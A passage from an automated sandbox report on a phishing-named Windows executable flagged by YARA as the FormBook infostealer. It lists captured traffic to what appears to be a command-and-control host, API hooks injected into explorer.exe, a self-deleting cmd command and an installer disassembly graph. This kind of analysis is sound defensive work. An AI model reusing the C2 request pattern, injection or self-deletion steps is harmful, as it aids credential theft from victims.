                      May 13, 2022 16:10:57.795835972 CEST11591INData Raw: 20 22 63 6f 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 4e 6f 20 74 69 65 6e 65 73 20 70 65 72 6d 69 73 6f 20 70 61 72 61 20 61 63 63 65 64 65 72 20 61 20 65 73 74 61 20 70 c3 a1 67 69 6e 61 20 77 65 62 22 0a 20 20 7d 2c 0a 20 20 22 6b 6f 22 3a
                      Data Ascii: "content-title": "No tienes permiso para acceder a esta pgina web" }, "ko": { "title": " ", "content-title": " " }, "da": { "title": "
                      May 13, 2022 16:10:57.795876026 CEST11593INData Raw: 86 e0 a4 aa e0 a4 95 e0 a5 8b 20 e0 a4 87 e0 a4 b8 20 e0 a4 b5 e0 a5 87 e0 a4 ac e0 a4 b8 e0 a4 be e0 a4 87 e0 a4 9f 20 e0 a4 a4 e0 a4 95 20 e0 a4 aa e0 a4 b9 e0 a5 81 e0 a4 82 e0 a4 9a 20 e0 a4 aa e0 a5 8d e0 a4 b0 e0 a4 be e0 a4 aa e0 a5 8d e0
                      Data Ascii: " }, "ja": { "title": "", "content-title": "
                      May 13, 2022 16:10:57.795908928 CEST11593INData Raw: 20 74 72 61 6e 73 6c 61 74 69 6f 6e 73 29 20 7b 0a 20 20 20 20 74 61 72 67 65 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 5b 64 61 74 61 2d 69 31 38 6e 3d 22 20 2b 20 69 64 20 2b 20 22 5d 22 29 3b 0a 20 20
                      Data Ascii: translations) { target = document.querySelector("[data-i18n=" + id + "]"); if (target != undefined) { target.innerHTML = translations[id]; } } // Replace title tage document.title = translations["title"]; // Replace
                      May 13, 2022 16:10:57.795937061 CEST11593INData Raw: 30 0d 0a 0d 0a
                      Data Ascii: 0


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      2192.168.2.4497773.64.163.5080C:\Windows\explorer.exe
                      TimestampkBytes transferredDirectionData
                      May 13, 2022 16:11:20.088871002 CEST11599OUTGET /amdf/?oTsXW=bHtTbh8HU&9rF=2pnwrPnaayjLTa+dMDr3ioSS0RS/WyH1Gjote8OZi1oxTz0HZpyyfRSy0TFJ31yfLnqh HTTP/1.1
                      Host: www.ultrakill.xyz
                      Connection: close
                      Data Raw: 00 00 00 00 00 00 00
                      Data Ascii:
                      May 13, 2022 16:11:20.108275890 CEST11600INHTTP/1.1 410 Gone
                      Server: openresty
                      Date: Fri, 13 May 2022 14:11:20 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: close
                      Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 64 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 75 6c 74 72 61 6b 69 6c 6c 2e 78 79 7a 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7<html>9 <head>4d <meta http-equiv='refresh' content='0; url=http://www.ultrakill.xyz/' />a </head>8</html>0


                      Code Manipulations

                      User Modules

                      Hook Summary

                      Function NameHook TypeActive in Processes
                      PeekMessageAINLINEexplorer.exe
                      PeekMessageWINLINEexplorer.exe
                      GetMessageWINLINEexplorer.exe
                      GetMessageAINLINEexplorer.exe

                      Processes

                      Process: explorer.exe, Module: user32.dll
                      Function NameHook TypeNew Data
                      PeekMessageAINLINE0x48 0x8B 0xB8 0x8E 0xEE 0xE6
                      PeekMessageWINLINE0x48 0x8B 0xB8 0x86 0x6E 0xE6
                      GetMessageWINLINE0x48 0x8B 0xB8 0x86 0x6E 0xE6
                      GetMessageAINLINE0x48 0x8B 0xB8 0x8E 0xEE 0xE6

                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Target ID:0
                      Start time:16:09:19
                      Start date:13/05/2022
                      Path:C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe"
                      Imagebase:0x400000
                      File size:278331 bytes
                      MD5 hash:8FBDF9F70B21179D87B83FE47B2137DD
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low

                      General

                      Target ID:1
                      Start time:16:09:21
                      Start date:13/05/2022
                      Path:C:\Users\user\AppData\Local\Temp\aeokw.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok
                      Imagebase:0xd70000
                      File size:80384 bytes
                      MD5 hash:6F70881E0183CE9F78E300CF2C8DC48E
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.258171974.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.258171974.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.258171974.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                      Reputation:low

                      General

                      Target ID:2
                      Start time:16:09:22
                      Start date:13/05/2022
                      Path:C:\Users\user\AppData\Local\Temp\aeokw.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok
                      Imagebase:0xd70000
                      File size:80384 bytes
                      MD5 hash:6F70881E0183CE9F78E300CF2C8DC48E
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.322163759.0000000000DD0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.322163759.0000000000DD0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.322163759.0000000000DD0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.322197992.0000000001100000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.322197992.0000000001100000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.322197992.0000000001100000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.256268925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.256268925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.256268925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.254937698.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.254937698.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.254937698.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                      Reputation:low

                      General

                      Target ID:5
                      Start time:16:09:27
                      Start date:13/05/2022
                      Path:C:\Windows\explorer.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\Explorer.EXE
                      Imagebase:0x7ff6f3b00000
                      File size:3933184 bytes
                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.294568326.000000000E814000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.294568326.000000000E814000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.294568326.000000000E814000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.310303298.000000000E814000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.310303298.000000000E814000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.310303298.000000000E814000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                      Reputation:high

                      General

                      Target ID:17
                      Start time:16:09:51
                      Start date:13/05/2022
                      Path:C:\Windows\SysWOW64\svchost.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\svchost.exe
                      Imagebase:0x2f0000
                      File size:44520 bytes
                      MD5 hash:FA6C268A5B5BDA067A901764D203D433
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.513829968.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.513829968.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.513829968.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.513722693.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.513722693.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.513722693.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                      Reputation:high

                      General

                      Target ID:19
                      Start time:16:09:56
                      Start date:13/05/2022
                      Path:C:\Windows\SysWOW64\cmd.exe
                      Wow64 process (32bit):true
                      Commandline:/c del "C:\Users\user\AppData\Local\Temp\aeokw.exe"
                      Imagebase:0x1190000
                      File size:232960 bytes
                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Target ID:20
                      Start time:16:09:57
                      Start date:13/05/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff647620000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Disassembly

                      Reset < >

                        Execution Graph

                        Execution Coverage:16.5%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:16.3%
                        Total number of Nodes:1372
                        Total number of Limit Nodes:22
                        execution_graph 3057 401941 3058 401943 3057->3058 3063 402da6 3058->3063 3064 402db2 3063->3064 3105 4066ab 3064->3105 3067 401948 3069 405d7a 3067->3069 3147 406045 3069->3147 3072 405da2 DeleteFileW 3102 401951 3072->3102 3073 405db9 3075 405ed9 3073->3075 3161 40666e lstrcpynW 3073->3161 3075->3102 3190 4069a4 FindFirstFileW 3075->3190 3076 405ddf 3077 405df2 3076->3077 3078 405de5 lstrcatW 3076->3078 3162 405f89 lstrlenW 3077->3162 3079 405df8 3078->3079 3082 405e08 lstrcatW 3079->3082 3084 405e13 lstrlenW FindFirstFileW 3079->3084 3082->3084 3084->3075 3085 405e35 3084->3085 3088 405ebc FindNextFileW 3085->3088 3098 405d7a 60 API calls 3085->3098 3101 4056d0 24 API calls 3085->3101 3166 40666e lstrcpynW 3085->3166 3167 405d32 3085->3167 3175 4056d0 3085->3175 3186 40642e MoveFileExW 3085->3186 3088->3085 3091 405ed2 FindClose 3088->3091 3089 405d32 5 API calls 3092 405f14 3089->3092 3091->3075 3093 405f18 3092->3093 3094 405f2e 3092->3094 3097 4056d0 24 API calls 3093->3097 3093->3102 3096 4056d0 24 API calls 3094->3096 3096->3102 3099 405f25 3097->3099 3098->3085 3100 40642e 36 API calls 3099->3100 3100->3102 3101->3088 3107 4066b8 3105->3107 3106 4068db 3108 402dd3 3106->3108 3138 40666e lstrcpynW 3106->3138 3107->3106 3110 4068a9 lstrlenW 3107->3110 3113 4066ab 10 API calls 3107->3113 3114 4067c0 GetSystemDirectoryW 3107->3114 3116 4067d3 GetWindowsDirectoryW 3107->3116 3117 40684a lstrcatW 3107->3117 3118 4066ab 10 API calls 3107->3118 3119 4068f5 5 API calls 3107->3119 3120 406802 SHGetSpecialFolderLocation 3107->3120 3131 40653c 3107->3131 3136 4065b5 wsprintfW 3107->3136 3137 40666e lstrcpynW 3107->3137 3108->3067 3122 4068f5 3108->3122 3110->3107 3113->3110 3114->3107 3116->3107 3117->3107 3118->3107 3119->3107 3120->3107 3121 40681a SHGetPathFromIDListW CoTaskMemFree 3120->3121 3121->3107 3128 406902 3122->3128 3123 40697d CharPrevW 3124 406978 3123->3124 3124->3123 3126 40699e 3124->3126 3125 40696b CharNextW 3125->3124 3125->3128 3126->3067 3128->3124 3128->3125 3129 406957 CharNextW 3128->3129 3130 406966 CharNextW 3128->3130 3143 405f6a 3128->3143 3129->3128 3130->3125 3139 4064db 3131->3139 3134 406570 RegQueryValueExW RegCloseKey 3135 4065a0 3134->3135 3135->3107 3136->3107 3137->3107 3138->3108 3140 4064ea 3139->3140 3141 4064f3 RegOpenKeyExW 3140->3141 3142 4064ee 3140->3142 3141->3142 3142->3134 3142->3135 3144 405f70 3143->3144 3145 405f86 3144->3145 3146 405f77 CharNextW 3144->3146 3145->3128 3146->3144 3196 40666e lstrcpynW 3147->3196 3149 406056 3197 405fe8 CharNextW CharNextW 3149->3197 3152 405d9a 3152->3072 3152->3073 3153 4068f5 5 API calls 3159 40606c 3153->3159 3154 40609d lstrlenW 3155 4060a8 3154->3155 3154->3159 3156 405f3d 3 API calls 3155->3156 3158 4060ad GetFileAttributesW 3156->3158 3157 4069a4 2 API calls 3157->3159 3158->3152 3159->3152 3159->3154 3159->3157 3160 405f89 2 API calls 3159->3160 3160->3154 3161->3076 3163 405f97 3162->3163 3164 405fa9 3163->3164 3165 405f9d CharPrevW 3163->3165 3164->3079 3165->3163 3165->3164 3166->3085 3203 406139 GetFileAttributesW 3167->3203 3170 405d5f 3170->3085 3171 405d55 DeleteFileW 3173 405d5b 3171->3173 3172 405d4d RemoveDirectoryW 3172->3173 3173->3170 3174 405d6b SetFileAttributesW 3173->3174 3174->3170 3176 40578d 3175->3176 3178 4056eb 3175->3178 3176->3085 3177 405707 lstrlenW 3180 405730 3177->3180 3181 405715 lstrlenW 3177->3181 3178->3177 3179 4066ab 17 API calls 3178->3179 3179->3177 3183 405743 3180->3183 3184 405736 SetWindowTextW 3180->3184 3181->3176 3182 405727 lstrcatW 3181->3182 3182->3180 3183->3176 3185 405749 SendMessageW SendMessageW SendMessageW 3183->3185 3184->3183 3185->3176 3187 406442 3186->3187 3189 40644f 3186->3189 3206 4062b4 3187->3206 3189->3085 3191 405efe 3190->3191 3192 4069ba FindClose 3190->3192 3191->3102 3193 405f3d lstrlenW CharPrevW 3191->3193 3192->3191 3194 405f08 3193->3194 3195 405f59 lstrcatW 3193->3195 3194->3089 3195->3194 3196->3149 3198 406005 3197->3198 3200 406017 3197->3200 3199 406012 CharNextW 3198->3199 3198->3200 3202 40603b 3199->3202 3201 405f6a CharNextW 3200->3201 3200->3202 3201->3200 3202->3152 3202->3153 3204 405d3e 3203->3204 3205 40614b SetFileAttributesW 3203->3205 3204->3170 3204->3171 3204->3172 3205->3204 3207 4062e4 3206->3207 3208 40630a GetShortPathNameW 3206->3208 3233 40615e GetFileAttributesW CreateFileW 3207->3233 3210 406429 3208->3210 3211 40631f 3208->3211 3210->3189 3211->3210 3213 406327 wsprintfA 3211->3213 3212 4062ee CloseHandle GetShortPathNameW 3212->3210 3214 406302 3212->3214 3215 4066ab 17 API calls 3213->3215 3214->3208 3214->3210 3216 40634f 3215->3216 3234 40615e GetFileAttributesW CreateFileW 3216->3234 3218 40635c 3218->3210 3219 40636b GetFileSize GlobalAlloc 3218->3219 3220 406422 CloseHandle 3219->3220 3221 40638d 3219->3221 3220->3210 3235 4061e1 ReadFile 3221->3235 3226 4063c0 3228 4060c3 4 API calls 3226->3228 3227 4063ac lstrcpyA 3229 4063ce 3227->3229 3228->3229 3230 406405 SetFilePointer 3229->3230 3242 406210 WriteFile 3230->3242 3233->3212 3234->3218 3236 4061ff 3235->3236 3236->3220 3237 4060c3 lstrlenA 3236->3237 3238 406104 lstrlenA 3237->3238 3239 40610c 3238->3239 3240 4060dd lstrcmpiA 3238->3240 3239->3226 3239->3227 3240->3239 3241 4060fb CharNextA 3240->3241 3241->3238 3243 40622e GlobalFree 3242->3243 3243->3220 3244 4015c1 3245 402da6 17 API calls 3244->3245 3246 4015c8 3245->3246 3247 405fe8 4 API calls 3246->3247 3259 4015d1 3247->3259 3248 401631 3250 401663 3248->3250 3251 401636 3248->3251 3249 405f6a CharNextW 3249->3259 3253 401423 24 API calls 3250->3253 3271 401423 3251->3271 3261 40165b 3253->3261 3258 40164a SetCurrentDirectoryW 3258->3261 3259->3248 3259->3249 3260 401617 GetFileAttributesW 3259->3260 3263 405c39 3259->3263 3266 405b9f CreateDirectoryW 3259->3266 3275 405c1c CreateDirectoryW 3259->3275 3260->3259 3278 406a3b GetModuleHandleA 3263->3278 3267 405bf0 GetLastError 3266->3267 3268 405bec 3266->3268 3267->3268 3269 405bff SetFileSecurityW 3267->3269 3268->3259 3269->3268 3270 405c15 GetLastError 3269->3270 3270->3268 3272 4056d0 24 API calls 3271->3272 3273 401431 3272->3273 3274 40666e lstrcpynW 3273->3274 3274->3258 3276 405c30 GetLastError 3275->3276 3277 405c2c 3275->3277 3276->3277 3277->3259 3279 406a61 GetProcAddress 3278->3279 3280 406a57 3278->3280 3281 405c40 3279->3281 3284 4069cb GetSystemDirectoryW 3280->3284 3281->3259 3283 406a5d 3283->3279 3283->3281 3285 4069ed wsprintfW LoadLibraryExW 3284->3285 3285->3283 3759 401c43 3781 402d84 3759->3781 3761 401c4a 3762 402d84 17 API calls 3761->3762 3763 401c57 3762->3763 3764 401c6c 3763->3764 3765 402da6 17 API calls 3763->3765 3766 401c7c 3764->3766 3767 402da6 17 API calls 3764->3767 3765->3764 3768 401cd3 3766->3768 3769 401c87 3766->3769 3767->3766 3770 402da6 17 API calls 3768->3770 3771 402d84 17 API calls 3769->3771 3772 401cd8 3770->3772 3773 401c8c 3771->3773 3774 402da6 17 API calls 3772->3774 3775 402d84 17 API calls 3773->3775 3776 401ce1 FindWindowExW 3774->3776 3777 401c98 3775->3777 3780 401d03 3776->3780 3778 401cc3 SendMessageW 3777->3778 3779 401ca5 SendMessageTimeoutW 3777->3779 3778->3780 3779->3780 3782 4066ab 17 API calls 3781->3782 3783 402d99 3782->3783 3783->3761 3784 405644 3785 405654 3784->3785 3786 405668 3784->3786 3788 4056b1 3785->3788 3789 40565a 3785->3789 3787 405670 IsWindowVisible 3786->3787 3795 405687 3786->3795 3787->3788 3790 40567d 3787->3790 3791 4056b6 CallWindowProcW 3788->3791 3792 404616 SendMessageW 3789->3792 3797 404f85 SendMessageW 3790->3797 3794 405664 3791->3794 3792->3794 3795->3791 3802 405005 3795->3802 3798 404fe4 SendMessageW 3797->3798 3799 404fa8 GetMessagePos ScreenToClient SendMessageW 3797->3799 3801 404fdc 3798->3801 3800 404fe1 3799->3800 3799->3801 3800->3798 3801->3795 3811 40666e lstrcpynW 3802->3811 3804 405018 3812 4065b5 wsprintfW 3804->3812 3806 405022 3807 40140b 2 API calls 3806->3807 3808 40502b 3807->3808 3813 40666e lstrcpynW 3808->3813 3810 405032 3810->3788 3811->3804 3812->3806 3813->3810 3814 4028c4 3815 4028ca 3814->3815 3816 4028d2 FindClose 3815->3816 3817 402c2a 3815->3817 3816->3817 3315 403646 SetErrorMode GetVersionExW 3316 4036d0 3315->3316 3317 403698 GetVersionExW 3315->3317 3318 403729 3316->3318 3319 406a3b 5 API calls 3316->3319 3317->3316 3320 4069cb 3 API calls 3318->3320 3319->3318 3321 40373f lstrlenA 3320->3321 3321->3318 3322 40374f 3321->3322 3323 406a3b 5 API calls 3322->3323 3324 403756 3323->3324 3325 406a3b 5 API calls 3324->3325 3326 40375d 3325->3326 3327 406a3b 5 API calls 3326->3327 3328 403769 #17 OleInitialize SHGetFileInfoW 3327->3328 3405 40666e lstrcpynW 3328->3405 3331 4037b6 GetCommandLineW 3406 40666e lstrcpynW 3331->3406 3333 4037c8 3334 405f6a CharNextW 3333->3334 3335 4037ee CharNextW 3334->3335 3345 4037ff 3335->3345 3336 4038fd 3337 403911 GetTempPathW 3336->3337 3407 403615 3337->3407 3339 403929 3340 403983 DeleteFileW 3339->3340 3341 40392d GetWindowsDirectoryW lstrcatW 3339->3341 3417 4030d0 GetTickCount GetModuleFileNameW 3340->3417 3343 403615 12 API calls 3341->3343 3342 405f6a CharNextW 3342->3345 3346 403949 3343->3346 3345->3336 3345->3342 3349 4038ff 3345->3349 3346->3340 3348 40394d GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3346->3348 3347 403996 3350 403b72 ExitProcess OleUninitialize 3347->3350 3354 403a4b 3347->3354 3360 405f6a CharNextW 3347->3360 3353 403615 12 API calls 3348->3353 3502 40666e lstrcpynW 3349->3502 3351 403b82 3350->3351 3352 403b97 3350->3352 3507 405cce 3351->3507 3357 403c15 ExitProcess 3352->3357 3358 403b9f GetCurrentProcess OpenProcessToken 3352->3358 3359 40397b 3353->3359 3446 403d1d 3354->3446 3365 403be5 3358->3365 3366 403bb6 LookupPrivilegeValueW AdjustTokenPrivileges 3358->3366 3359->3340 3359->3350 3371 4039b8 3360->3371 3362 403a5a 3362->3350 3367 406a3b 5 API calls 3365->3367 3366->3365 3370 403bec 3367->3370 3368 403a21 3373 406045 18 API calls 3368->3373 3369 403a62 3372 405c39 5 API calls 3369->3372 3374 403c01 ExitWindowsEx 3370->3374 3375 403c0e 3370->3375 3371->3368 3371->3369 3376 403a67 lstrcatW 3372->3376 3377 403a2d 3373->3377 3374->3357 3374->3375 3511 40140b 3375->3511 3379 403a83 lstrcatW lstrcmpiW 3376->3379 3380 403a78 lstrcatW 3376->3380 3377->3350 3503 40666e lstrcpynW 3377->3503 3379->3362 3381 403aa3 3379->3381 3380->3379 3383 403aa8 3381->3383 3384 403aaf 3381->3384 3386 405b9f 4 API calls 3383->3386 3387 405c1c 2 API calls 3384->3387 3385 403a40 3504 40666e lstrcpynW 3385->3504 3389 403aad 3386->3389 3390 403ab4 SetCurrentDirectoryW 3387->3390 3389->3390 3391 403ad1 3390->3391 3392 403ac6 3390->3392 3506 40666e lstrcpynW 3391->3506 3505 40666e lstrcpynW 3392->3505 3395 4066ab 17 API calls 3396 403b13 DeleteFileW 3395->3396 3397 403b1f CopyFileW 3396->3397 3402 403ade 3396->3402 3397->3402 3398 403b69 3399 40642e 36 API calls 3398->3399 3399->3362 3400 40642e 36 API calls 3400->3402 3401 4066ab 17 API calls 3401->3402 3402->3395 3402->3398 3402->3400 3402->3401 3403 405c51 2 API calls 3402->3403 3404 403b53 CloseHandle 3402->3404 3403->3402 3404->3402 3405->3331 3406->3333 3408 4068f5 5 API calls 3407->3408 3410 403621 3408->3410 3409 40362b 3409->3339 3410->3409 3411 405f3d 3 API calls 3410->3411 3412 403633 3411->3412 3413 405c1c 2 API calls 3412->3413 3414 403639 3413->3414 3514 40618d 3414->3514 3518 40615e GetFileAttributesW CreateFileW 3417->3518 3419 403113 3445 403120 3419->3445 3519 40666e lstrcpynW 3419->3519 3421 403136 3422 405f89 2 API calls 3421->3422 3423 40313c 3422->3423 3520 40666e lstrcpynW 3423->3520 3425 403147 GetFileSize 3426 403246 3425->3426 3428 40315e 3425->3428 3521 40302e 3426->3521 3428->3426 3432 4032e4 3428->3432 3439 40302e 32 API calls 3428->3439 3428->3445 3552 4035e8 3428->3552 3430 403289 GlobalAlloc 3435 40618d 2 API calls 3430->3435 3433 40302e 32 API calls 3432->3433 3433->3445 3437 4032b4 CreateFileW 3435->3437 3436 40326a 3438 4035e8 ReadFile 3436->3438 3440 4032ee 3437->3440 3437->3445 3442 403275 3438->3442 3439->3428 3536 4035fe SetFilePointer 3440->3536 3442->3430 3442->3445 3443 4032fc 3537 403377 3443->3537 3445->3347 3447 406a3b 5 API calls 3446->3447 3448 403d31 3447->3448 3449 403d37 GetUserDefaultUILanguage 3448->3449 3450 403d49 3448->3450 3572 4065b5 wsprintfW 3449->3572 3452 40653c 3 API calls 3450->3452 3454 403d79 3452->3454 3453 403d47 3573 403ff3 3453->3573 3455 403d98 lstrcatW 3454->3455 3456 40653c 3 API calls 3454->3456 3455->3453 3456->3455 3459 406045 18 API calls 3460 403dca 3459->3460 3461 403e5e 3460->3461 3463 40653c 3 API calls 3460->3463 3462 406045 18 API calls 3461->3462 3464 403e64 3462->3464 3465 403dfc 3463->3465 3466 403e74 LoadImageW 3464->3466 3467 4066ab 17 API calls 3464->3467 3465->3461 3470 403e1d lstrlenW 3465->3470 3474 405f6a CharNextW 3465->3474 3468 403f1a 3466->3468 3469 403e9b RegisterClassW 3466->3469 3467->3466 3473 40140b 2 API calls 3468->3473 3471 403ed1 SystemParametersInfoW CreateWindowExW 3469->3471 3472 403f24 3469->3472 3475 403e51 3470->3475 3476 403e2b lstrcmpiW 3470->3476 3471->3468 3472->3362 3477 403f20 3473->3477 3478 403e1a 3474->3478 3480 405f3d 3 API calls 3475->3480 3476->3475 3479 403e3b GetFileAttributesW 3476->3479 3477->3472 3483 403ff3 18 API calls 3477->3483 3478->3470 3482 403e47 3479->3482 3481 403e57 3480->3481 3581 40666e lstrcpynW 3481->3581 3482->3475 3486 405f89 2 API calls 3482->3486 3484 403f31 3483->3484 3487 403fc0 3484->3487 3488 403f3d ShowWindow 3484->3488 3486->3475 3582 4057a3 OleInitialize 3487->3582 3489 4069cb 3 API calls 3488->3489 3494 403f55 3489->3494 3491 403fc6 3492 403fe2 3491->3492 3495 403fca 3491->3495 3496 40140b 2 API calls 3492->3496 3493 403f63 GetClassInfoW 3498 403f77 GetClassInfoW RegisterClassW 3493->3498 3499 403f8d DialogBoxParamW 3493->3499 3494->3493 3497 4069cb 3 API calls 3494->3497 3495->3472 3500 40140b 2 API calls 3495->3500 3496->3472 3497->3493 3498->3499 3501 40140b 2 API calls 3499->3501 3500->3472 3501->3472 3502->3337 3503->3385 3504->3354 3505->3391 3506->3402 3508 405ce3 